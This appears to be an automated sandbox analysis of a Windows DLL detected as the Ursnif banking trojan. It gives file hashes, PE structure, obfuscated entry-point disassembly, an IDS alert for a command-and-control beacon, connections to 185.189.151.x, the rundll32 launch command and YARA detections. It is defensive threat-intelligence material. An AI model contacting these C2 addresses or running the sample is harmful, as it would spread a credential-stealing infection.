                                    Entropy (8bit):0.7418484685932353
                                    Encrypted:false
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.7491020229109185
                                    Encrypted:false
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Tue May 17 17:46:23 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):36770
                                    Entropy (8bit):2.018958433339166
                                    Encrypted:false
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8350
                                    Entropy (8bit):3.6866150515390714
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNifl6n96YoySU8IZAMgmf2SuCpN/89bZ0i1fozm:RrlsNit6n96YtSU8Idgmf2SwZ0YfR
                                    MD5:153C30368B8BF499D723950830863E68
                                    SHA1:D5DD0DAE2DB1B0FDC511BB51D711D91218D7A410
                                    SHA-256:F99B459A4DEF2FEC02024A6C9987FC2B9CDDFC42DADFB1EC0D1E29D96CD64690
                                    SHA-512:2215A733753C41E8373BA7D6E80D32A008CEA2E7A654E01B37D00CA143A37C94F6AFBDAB6737C210FAE61EAF029163922F9C87D1BC521FF2B39A2462115D0161
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6164</Pid>
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4665
                                    Entropy (8bit):4.415556146581757
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zslJgtWI9rrWgc8sqYj88fm8M4J2+IkFsho+q8vQ+IsKcQIcQw0vd:uITf/AagrsqYFJiAKksKkw0vd
                                    MD5:B2716E86BF6E8EADD14CE30BE99EA6C9
                                    SHA1:1E4243D473402753215F6817B8F96EDCD2288CE3
                                    SHA-256:F3DAF4907EDD8E06E5CB89AAEFCE666C0948904E2E41656DF8CB837CFFA19E42
                                    SHA-512:7C958B5EFEDAE130CDA0596891920EBD3FB76C3BB8F288C94AC7EC7378D3E7251A824A17E9F1C3078A0EA4047408EDE9EAF7C6BF53E74F4A577125464F6D9F9D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Tue May 17 17:46:27 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):36570
                                    Entropy (8bit):1.963441699352685
                                    Encrypted:false
                                    SSDEEP:192:bGRkOtRQ8xOsjl7Ab/3hfQSsw/PFnzkVPtvgRbVub3vnyCLAF:IRQJsR7STs4PF4VPZe
                                    MD5:E74752610B3F2B72E9F54F2896BA84A7
                                    SHA1:049CE65B7342E38F1187A02DA2921BDD878CB6C4
                                    SHA-256:5E4978473726FAD05A527A7F2B15EEACCCFC195168C2FEEFC032DDE3A1CC5C84
                                    SHA-512:9F9C21C38572FCDFEB130F80E549EDB73E618B898E89C91CC8AC96CD0023A7214EA8ADC8F8A50C398C9685F77CF0956B7D3FD757A34EED8F7ACBFD7E2A50B20B
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8330
                                    Entropy (8bit):3.6969773053771005
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNifK6Nn6YogSUqfgmftSuCpr789bC0qsf0iIWm:RrlsNiS6Nn6YvSUqfgmftSKC0Jf3w
                                    MD5:5E1BDBE4B0EAC420C3E6A261F1F0728B
                                    SHA1:84D6A1AC2998D48BDCE5F2A83038660BDB4B5E93
                                    SHA-256:CC786E33785A7F37D9AF82F267A0619A689A508B45D7C848F6C3FD83F39F3FD5
                                    SHA-512:FDB19045DA7F28F63F00E96136FD9B8447988936E096507CFA1513AEB6C655A0CEBA38037E5720F3F885669D47397781526584843690CB0470DE3E6527076801
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6164</Pid>
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4598
                                    Entropy (8bit):4.470238995950005
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zslJgtWI9rrWgc8sqYjT8fm8M4J2+uZFPk+q849LdKcQIcQw0ed:uITf/AagrsqYMJ0QtdKkw0ed
                                    MD5:A30EFF1254FF492B1692F5A8E28DB0AA
                                    SHA1:A8078340FAF23A434C5809174497EB20913EEC08
                                    SHA-256:E3C2A06ADD5AD26ABF77097FB779006893811115D5FB4BD394525DD88472C681
                                    SHA-512:FF42202BD8AF8CDAFE8A75F7A0432E1571823B7EECE26026CC40919DFDDAEF9069910B328EC6AC19BBE1E1001EA4A71D52CB2A716C58673D49BD30F888236A3F
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Tue May 17 17:46:32 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):49574
                                    Entropy (8bit):2.210710362054232
                                    Encrypted:false
                                    SSDEEP:192:qh8dkOtRO4+ROs3fpihK13usiXGN0PgQoDmwcZeQsgBxZG58e9tFaiQSsw/PFnA/:qwROisPpKGWbHZs8QjhTs4PFR4ZToxDW
                                    MD5:02568CFCB4AC03D9A318D9A1CBC32E0D
                                    SHA1:F1550A2D7DED2097431C376C941D6F6E216B3E0B
                                    SHA-256:DC064A2A66541B291785C2764DD5F565A81C10AD15E42628BE709CCE66389991
                                    SHA-512:F3E1D73ABB7B2C4D346FC2A25C955C897384D6321BBD1E0B77409396849BE9A07B2AF765D7236D4616A8F2482E0771FBFF894BDA9504C1DC319BDD4B71675CE2
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8294
                                    Entropy (8bit):3.68940098362101
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNifS64m96YomSU9IvAMgmfZSLCpDs89b+0qsfvqm:RrlsNiq6H96YpSU9IrgmfZSa+0Jfz
                                    MD5:B4AD9CEAFFF84C71EBC7925850F647C1
                                    SHA1:6B103115887DAA90C9CA3190D176E6C8F49863B7
                                    SHA-256:DE5F73668A888362ECF48DF4E6F750BCCE84D98E29E387AA58FB881B46E41D4E
                                    SHA-512:F0972F4561152F0E5F4AC4CAEB66A0E2BA3C4293BA8FF090912BB99A74EB01570FAC37F934A294DB2F2FC5BD5467DFDCC8612D03490BC751B4EC69AE1A8F4F26
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6164</Pid>
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4564
                                    Entropy (8bit):4.428812019736952
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zslJgtWI9rrWgc8sqYjD8fm8M4J2+EXFrb+q84Pv/KcQIcQw0ed:uITf/AagrsqYkJGJL/Kkw0ed
                                    MD5:4ABF390CC55B28E9EB8BDB1880978763
                                    SHA1:3B8DFD5E6EFEB533F1834EA412851E91BA8DF6C2
                                    SHA-256:4CBB835351594FA5467D3F2173084A80F75A975554B4BF0C3FF6EC65BE3C0978
                                    SHA-512:A657E7317CB9BBDF037A53C5E80C9C42052BC30C62212879C025676844CCCD066BE79065B6F348A195D5B469A6B9B7921FDF3E41BCB770E9D50F32DE92A2C181
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.254256478645708
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:62835e34e60c1.dll
                                    File size:442368
                                    MD5:5572213d17be7de71f36fa68eb6808a8
                                    SHA1:5e8b27d57f6c9dc02cf2e30d47f8ed439f0fa20e
                                    SHA256:f58f9c8e6a62223efa263da10850e188004471cb2be65264b7f91f27ebab0766
                                    SHA512:f015eb3c633c916227b19dc1e446d189ce8ebbb82cadf1c71d962e9d67d8d43defef437f0cb41974173e14c8fdc65808c74e4baacc723ecf0d4c87078566334d
                                    SSDEEP:6144:oE1iktxgcV9yjYJrTOkRLookGIw8OaDSOKdPmo6iJTk/DmpFkbakc+abuFGGGGGD:oE44xgcV9yjY1OkEGx/V72/DmSH6/
                                    TLSH:3894E00965216A6EC9DC273DC9E5D31B1DA2B75CD23E70BE3CF43C9F7AE5125820428A
                                    Icon Hash:9068eccc64f6e2ad
                                    Entrypoint:0x4014d0
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:a2b7486f7219709bc441af397fbc35ab
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    add ecx, FFFFFFFFh
                                    call 00007F7390BECE6Ah
                                    pop eax
                                    pop eax
                                    mov dword ptr [0041461Ch], eax
                                    mov edx, dword ptr [00414738h]
                                    sub edx, 00005289h
                                    call edx
                                    mov eax, ebx
                                    mov dword ptr [00414618h], eax
                                    mov eax, esi
                                    mov dword ptr [00414610h], eax
                                    mov dword ptr [00414620h], ebp
                                    mov dword ptr [00414614h], edi
                                    add dword ptr [00414620h], 00000004h
                                    loop 00007F7390BECE17h
                                    mov dword ptr [ebp+00h], eax
                                    nop
                                    nop
                                    nop
                                    push esp
                                    push D72C767Ah
                                    jbe 00007F7390BECEBFh
                                    xlatb
                                    rcl dword ptr [edi+2E46AAC6h], cl
                                    jle 00007F7390BECE96h
                                    in al, dx
                                    mov eax, A897C0E8h
                                    pushfd
                                    xor al, D1h
                                    push esi
                                    shl dword ptr [edx+7D8B0393h], 4Fh
                                    int3
                                    pop ss
                                    mov dh, 0Eh
                                    push es
                                    sub dword ptr [esi-0Ah], esp
                                    xchg dword ptr [esp+edi*2], ebp
                                    xor esi, dword ptr [esi]
                                    mov eax, 7DE0500Fh
                                    dec ebp
                                    sar eax, FFFFFFDEh
                                    mov byte ptr [379552ECh], al
                                    std
                                    test al, E7h
                                    sub al, A4h
                                    scasb
                                    add ebx, dword ptr [edx]
                                    pop es
                                    xchg eax, ebx
                                    dec edi
                                    int B4h
                                    cmpsd
                                    int 35h
                                    mov dh, BDh
                                    mov byte ptr [ebp-1BA85C92h], dl
                                    mov es, word ptr [esi+34867DB0h]
                                    out dx, al
                                    push ecx
                                    mov ebx, 7D4347D0h
                                    and al, B0h
                                    jbe 00007F7390BECDE7h
                                    sti
                                    push ds
                                    push cs
                                    fpatan
                                    clc
                                    jl 00007F7390BECEB0h
                                    xor ebp, dword ptr [edi]
                                    cmc
                                    fstsw word ptr [esp+ebx*2-12A5E66Ah]
                                    jp 00007F7390BECE37h
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdd7c | 0x8c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf40 | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb8 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0xb8a0 | 0xc000 | False | 0.0812784830729 | data | 1.12155002117 | IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_OVER, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                                    .rdata | 0xd000 | 0x121f | 0x2000 | False | 0.187133789062 | data | 4.12151309824 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_MEM_READ
                                    .data | 0xf000 | 0x7ac0 | 0x6000 | False | 0.37646484375 | data | 6.00984449077 | IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_GPREL, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                                    .crt | 0x17000 | 0x1dcbd | 0x1e000 | False | 0.988419596354 | data | 7.98105173778 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .erloc | 0x35000 | 0x2ca3b | 0x2d000 | False | 0.988259548611 | data | 7.98162384749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                                    .reloc | 0x6c000 | 0x1360 | 0x2000 | False | 0.223266601562 | data | 3.77920644751 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country
                                    RT_BITMAP | 0x62360 | 0x666 | data | English | United States
                                    RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                    RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
                                    RT_ICON | 0x697d0 | 0xea8 | data | English | United States
                                    RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                                    RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                                    RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States
                                    RT_DIALOG | 0x6b540 | 0x120 | data | English | United States
                                    RT_DIALOG | 0x6b660 | 0x158 | data | English | United States
                                    RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States
                                    RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States
                                    RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States
                                    RT_DIALOG | 0x6bb58 | 0xee | data | English | United States
                                    RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States
                                    RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                                    DLL | Import
                                    USER32.dll | IsWindow, LockWorkStation, ExitWindowsEx, LoadCursorFromFileA, IsWindowEnabled, GetMessagePos, GetClassNameA, GetClientRect, GetUpdateRgn, GetWindowWord
                                    KERNEL32.dll | GlobalFree, GetCommState, LockFile, EnumResourceTypesA, GetProcAddress, GetVolumePathNamesForVolumeNameW, GetShortPathNameW, GlobalMemoryStatus, WriteProcessMemory, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetBinaryTypeA, GetModuleFileNameA
                                    OLEAUT32.dll | LoadTypeLibEx
                                    msvcrt.dll | strcoll, strftime, strtod, strncmp, fgetwc
                                    GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, GdiFlush, ExtEscape
                                    ADVAPI32.dll | RegGetValueA, EnumServicesStatusExW, FreeEncryptionCertificateHashList, GetUserNameW, GetSidSubAuthorityCount
                                    Description | Data
                                    LegalCopyright | A Company. All rights reserved.
                                    InternalName |
                                    FileVersion | 1.0.0.0
                                    CompanyName | A Company
                                    ProductName |
                                    ProductVersion | 1.0.0.0
                                    FileDescription |
                                    OriginalFilename | myfile.exe
                                    Translation | 0x0409 0x04b0
                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |
                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    05/17/22-10:46:47.467879 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49772 | 80 | 192.168.2.5 | 13.107.43.16
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    May 17, 2022 10:47:07.655096054 CEST | 49784 | 80 | 192.168.2.5 | 185.189.151.28
                                    May 17, 2022 10:47:10.664288998 CEST | 49784 | 80 | 192.168.2.5 | 185.189.151.28
                                    May 17, 2022 10:47:16.765568018 CEST | 49784 | 80 | 192.168.2.5 | 185.189.151.28
                                    May 17, 2022 10:48:49.267137051 CEST | 49878 | 80 | 192.168.2.5 | 185.189.151.70
                                    May 17, 2022 10:48:52.280919075 CEST | 49878 | 80 | 192.168.2.5 | 185.189.151.70
                                    May 17, 2022 10:48:58.281450033 CEST | 49878 | 80 | 192.168.2.5 | 185.189.151.70
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    May 17, 2022 10:46:47.370256901 CEST | 8.8.8.8 | 192.168.2.5 | 0xddb8 | No error (0) | l-0007.l-dc-msedge.net | | 13.107.43.16 | A (IP address) | IN (0x0001)

                                    Target ID:0
                                    Start time:10:46:19
                                    Start date:17/05/2022
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll"
                                    Imagebase:0xb80000
                                    File size:116736 bytes
                                    MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:1
                                    Start time:10:46:20
                                    Start date:17/05/2022
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
                                    Imagebase:0x1100000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:3
                                    Start time:10:46:20
                                    Start date:17/05/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
                                    Imagebase:0x3a0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:4
                                    Start time:10:46:22
                                    Start date:17/05/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400
                                    Imagebase:0x9b0000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:6
                                    Start time:10:46:26
                                    Start date:17/05/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 408
                                    Imagebase:0x9b0000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:9
                                    Start time:10:46:31
                                    Start date:17/05/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 412
                                    Imagebase:0x9b0000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high


                                      Execution Graph

                                      Execution Coverage:6.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:7
                                      Total number of Limit Nodes:0
                                      execution_graph 252 4014b0 255 40ba30 252->255 258 401340 255->258 257 4014b9 259 401420 258->259 261 40135d 258->261 260 4013e1 GetBinaryTypeA 259->260 259->261 260->261 261->257

                                      Callgraph

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 401340-401357 1 401430-40144a 0->1 2 40135d-401366 0->2 1->2 3 401450-40149d 1->3 6 401420-401427 3->6 7 40149f 3->7 9 401452-401459 6->9 10 401429 6->10 8 4013e1-401418 GetBinaryTypeA 7->8 13 401367-4013dc call 40c150 8->13 14 40141e 8->14 11 40142b 9->11 12 40145b 9->12 10->8 11->2 12->8 13->2 14->11
                                      APIs
                                      Strings
                                      Memory Dump Source
